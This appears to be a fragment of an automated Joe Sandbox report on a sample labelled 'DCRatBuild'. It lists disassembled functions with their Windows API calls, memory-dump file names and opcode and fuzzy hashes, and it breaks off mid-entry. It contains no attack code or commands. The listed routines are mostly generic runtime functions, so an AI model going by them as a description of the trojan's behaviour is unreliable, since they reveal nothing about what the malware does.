Function 0007A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0007A23A,?,0007755C,?,?,?,?), ref: 0007A254

Part of subcall function 0007BB03: _wcslen.LIBCMT ref: 0007BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0007A23A,?,0007755C,?,?,?,?), ref: 0007A280

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 067a05fac784fed67399284999b6b7e349b52d0c87d32942bd576740224f47c4
Instruction ID: d2dbc1034c73ea891d05ebb7fdae42adce3d897a7107dd73548a93473fed3f4e
Opcode Fuzzy Hash: 067a05fac784fed67399284999b6b7e349b52d0c87d32942bd576740224f47c4
Instruction Fuzzy Hash: 7FE092319001249BDB50AB68CC05BD97798AB0A3E2F048261FD48E3191DB78DE45CAA4

Function 0008DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0008DEEC

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

SetDlgItemTextW.USER32(00000065,?), ref: 0008DF03

Part of subcall function 0008B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0008B579
Part of subcall function 0008B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008B58A
Part of subcall function 0008B568: IsDialogMessageW.USER32(000103F6,?), ref: 0008B59E
Part of subcall function 0008B568: TranslateMessage.USER32(?), ref: 0008B5AC
Part of subcall function 0008B568: DispatchMessageW.USER32(?), ref: 0008B5B6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: f7a4f1d3b8f8de8d19d832be082c2574578b2fc8234c3c062d1b34bbe5ae3340
Instruction ID: 2e9762ab1cce5599edafc2fc8c4fdb736376c22dff81f23997afa253e871a92d
Opcode Fuzzy Hash: f7a4f1d3b8f8de8d19d832be082c2574578b2fc8234c3c062d1b34bbe5ae3340
Instruction Fuzzy Hash: E8E092B680028866EF02BB60DC06FDE3B6C6B15785F444851B644DA0B3EA7CEA108765

Function 0008081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00080836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0007F2D8,Crypt32.dll,00000000,0007F35C,?,?,0007F33E,?,?,?), ref: 00080858

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 59cd0e2c6fdd612b56d33fe2934263617ab79c3055df80eaf0621709fdb55a6a
Instruction ID: 97bb0d92eaccda47aa53802770202d8c632692b5eddae1d423cde2cbd1412f30
Opcode Fuzzy Hash: 59cd0e2c6fdd612b56d33fe2934263617ab79c3055df80eaf0621709fdb55a6a
Instruction Fuzzy Hash: 33E04876C00258ABDB11A794DC05FDB77ACFF0A3D1F0400657649D2005DA78DA84CBB0

Function 0008A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0008A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0008A3E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: ddce221b02dd6286061df4e271e149f02a70d847818646fbd2316da4c9b8b3e5
Instruction ID: b7357df78d059015ee48443938b28fdfe8a4000f76e8195138bf135aa18dadc4
Opcode Fuzzy Hash: ddce221b02dd6286061df4e271e149f02a70d847818646fbd2316da4c9b8b3e5
Instruction Fuzzy Hash: DBE0ED71504218EBDB50EF95C5416DEBBE8FB05360F10805AA88693601E3B4AF04DB91

Function 00092B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00092BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00092BB5

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 67748288f04701aa172dca1ff1983e3b7818bef8c5e0ffcfb619b0a14a97be03
Instruction ID: 7e59fff0528c52ce206350cafd94e490f68b0b2fd717617361968d016cc0bc95
Opcode Fuzzy Hash: 67748288f04701aa172dca1ff1983e3b7818bef8c5e0ffcfb619b0a14a97be03
Instruction Fuzzy Hash: E4D02235558700385C682E707C134DC33C5AF52B71BA0428AF120898C3EF109040F922

Function 000712F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00071306
ShowWindow.USER32(00000000), ref: 0007130D

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 68d4ab2f78cf4fa665a7849f6bef83da2001569b6ce408fe483c5017d96cc004
Instruction ID: c611e9988dfd8e4298836e7746bf83961a45c6cf8efd6c4e62ec56147668f70d
Opcode Fuzzy Hash: 68d4ab2f78cf4fa665a7849f6bef83da2001569b6ce408fe483c5017d96cc004
Instruction Fuzzy Hash: C2C0123A05C202BEDB011BB4DC0AC2BBBA8ABA6312F04C90AB4A5C0060C23CC110DB22

Function 00071A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00071A09

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bec411cc6c6cf2c2c8f67c234011cb8f42b6b3e618e367bb31e11e45c38f2338
Instruction ID: 9ddd8202060331eda0c5337de99e2f7f84739687b425212160977897f4812586
Opcode Fuzzy Hash: bec411cc6c6cf2c2c8f67c234011cb8f42b6b3e618e367bb31e11e45c38f2338
Instruction Fuzzy Hash: EBC19E70E002549BEF69CF6CC484BE97BE5AF15310F0881B9EC499B2D6DB389D44CB65

Function 00073BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00073BBF

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 091d97fd086abfcc14de20af997dd3b7f9873c05572696a27de84a8fe7247f4f
Instruction ID: 67263f5b8241d80682fc4ee4209e6951030e7cfcedfc679e5a7d71a3ee34d144
Opcode Fuzzy Hash: 091d97fd086abfcc14de20af997dd3b7f9873c05572696a27de84a8fe7247f4f
Instruction Fuzzy Hash: B071B271900B849EDB35DB74CC559EBB7E9AF14300F40892EE1AF87242DA3A6A84DF15

Function 00078284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00078289

Part of subcall function 000713DC: __EH_prolog.LIBCMT ref: 000713E1

Part of subcall function 0007A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0007A598

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: a78f6478ad823e3078da5734d0d1903aa655165180caf496cb03cfcc5a18ecd4
Instruction ID: 6869211c975e6b2b7bf54984a90726ef12c8ae0803bbd61f9a971528b9b8e9e5
Opcode Fuzzy Hash: a78f6478ad823e3078da5734d0d1903aa655165180caf496cb03cfcc5a18ecd4
Instruction Fuzzy Hash: 71419971D446589ADB20EB64CC59AEAB3A8BF00304F4484EAE18E97093EB795FC5CB54

Function 000713E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000713E1

Part of subcall function 00075E37: __EH_prolog.LIBCMT ref: 00075E3C

Part of subcall function 0007CE40: __EH_prolog.LIBCMT ref: 0007CE45

Part of subcall function 0007B505: __EH_prolog.LIBCMT ref: 0007B50A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 37c993e94299174b69024796cf479d91da360916891c9c59be923452aac74416
Instruction ID: 5a5a15d6da6335d55327e4f8d30a6cb2db03f65360209a99b7c0eb9c990c94e5
Opcode Fuzzy Hash: 37c993e94299174b69024796cf479d91da360916891c9c59be923452aac74416
Instruction Fuzzy Hash: 464147B0905B409EE724DF798885AE7FBE5BF19310F50892EE5FE83282CB356654CB14

Function 000713DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000713E1

Part of subcall function 00075E37: __EH_prolog.LIBCMT ref: 00075E3C

Part of subcall function 0007CE40: __EH_prolog.LIBCMT ref: 0007CE45

Part of subcall function 0007B505: __EH_prolog.LIBCMT ref: 0007B50A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e3b86a94f8209f0853deb6d116e8c18d07cbc6228eec311403866381333b84a6
Instruction ID: 4e14a3829dd7cbfcd6d6859946afef0b747729b7cd6149f1dd3131061cc57521
Opcode Fuzzy Hash: e3b86a94f8209f0853deb6d116e8c18d07cbc6228eec311403866381333b84a6
Instruction Fuzzy Hash: 974147B0905B409EE724DF798885AE6FBE5BF19300F50492EE5FE83282CB356654CB14

Function 0008359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000835A3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: added042d2b41e28647d0492924e38ec430825c2c356573d56da337acc771b1a
Instruction ID: 5cfbaa7f66a5f7a86e613e89cf2b7049be259e0f30a9acc795ef7001f7d806ed
Opcode Fuzzy Hash: added042d2b41e28647d0492924e38ec430825c2c356573d56da337acc771b1a
Instruction Fuzzy Hash: F421F8B1E40212ABDB14AF78CC416AB76A8FF54714F10413AA506EB682E7749A00C7E8

Function 0008B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0008B098

Part of subcall function 000713DC: __EH_prolog.LIBCMT ref: 000713E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: aa01e8b8b45f0b6a506d3eaf5113f0d3c0b84be98c6947db9ac4809d3996d3d6
Instruction ID: 153d6cc0d5bcc1c7a44684d596b275582082e514090a38c7ccc715480c3991e6
Opcode Fuzzy Hash: aa01e8b8b45f0b6a506d3eaf5113f0d3c0b84be98c6947db9ac4809d3996d3d6
Instruction Fuzzy Hash: 73316D71D102499BCF15EFA8C8519EEB7B4BF09300F5044AEE449B7282D739AE04CBA5

Function 00079215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0007921A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cf0a61084f4a9c5e0d3af18b1b58e8408d240ad01d88dcf8b3713c978c4b41e2
Instruction ID: 78d6da94e2545306a69fba81515d99e71711f44c6d39d8e98271deb385136caf
Opcode Fuzzy Hash: cf0a61084f4a9c5e0d3af18b1b58e8408d240ad01d88dcf8b3713c978c4b41e2
Instruction Fuzzy Hash: 07018233D00528ABCF12BBA8CC829DEB775AF88740B018125E81ABB153DA388D1186A4

Function 00093C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00093C3F

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 89fbeb085bb5f8062a8848757714aeaf841fb098ee479989ab2b6be355e048ad
Instruction ID: 514da1f5abe6d81085ea32f4d9d6bc8091ddef002bb73f80c9c029a1c22ce6ae
Opcode Fuzzy Hash: 89fbeb085bb5f8062a8848757714aeaf841fb098ee479989ab2b6be355e048ad
Instruction Fuzzy Hash: 3AF0E572204A169FDF118EA8EC14A9A77E9EF41B207104125FE05E71A0DB31EA20EFA0

Function 00098E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00094286,?,0000015D,?,?,?,?,00095762,000000FF,00000000,?,?), ref: 00098E38

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8732c62c734c37627ed37accba7c27b4c35481a10aa1c801c7807d2ff65e11e6
Instruction ID: 13120f8796fdeba5f2250682c8c3090b449b7c0b65687cc56c8e7a1c4361449f
Opcode Fuzzy Hash: 8732c62c734c37627ed37accba7c27b4c35481a10aa1c801c7807d2ff65e11e6
Instruction Fuzzy Hash: BDE06D3220622567EEB126759C29BDF768C9B837A4F15C122BC18962A2DF24CC00B3E1

Function 00075ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00075AC2

Part of subcall function 0007B505: __EH_prolog.LIBCMT ref: 0007B50A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f62b795d27724af4decbb3b8b3638b49ced7c6d3afababccaaf03f99e89393e0
Instruction ID: b1cedad9a9e2c3f042f0a2c5e5e3bde0da126ec9c50d7dc479aaee3878a4d5df
Opcode Fuzzy Hash: f62b795d27724af4decbb3b8b3638b49ced7c6d3afababccaaf03f99e89393e0
Instruction Fuzzy Hash: 80018C30A10694DAD725F7B8C0417DDFBA4AF64308F51848DA49A53383DBB41B18D7A2

Function 0007A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0007A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6C4
Part of subcall function 0007A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6F2
Part of subcall function 0007A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0007A592,000000FF,?,?), ref: 0007A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0007A598

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 75ffb4babc3bed97f94d47430161344cd8cc0ebda71ec9de987ab3f5c54afef2
Instruction ID: d1e21ef304266fd5c1bb1192b7c1b50baab2bcb99af6deafe06cf900683b766f
Opcode Fuzzy Hash: 75ffb4babc3bed97f94d47430161344cd8cc0ebda71ec9de987ab3f5c54afef2
Instruction Fuzzy Hash: D1F0BE32808B80AACA6257B88804BCFBB906F9B331F04CA09F0FD12097C27910958B37

Function 00080E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

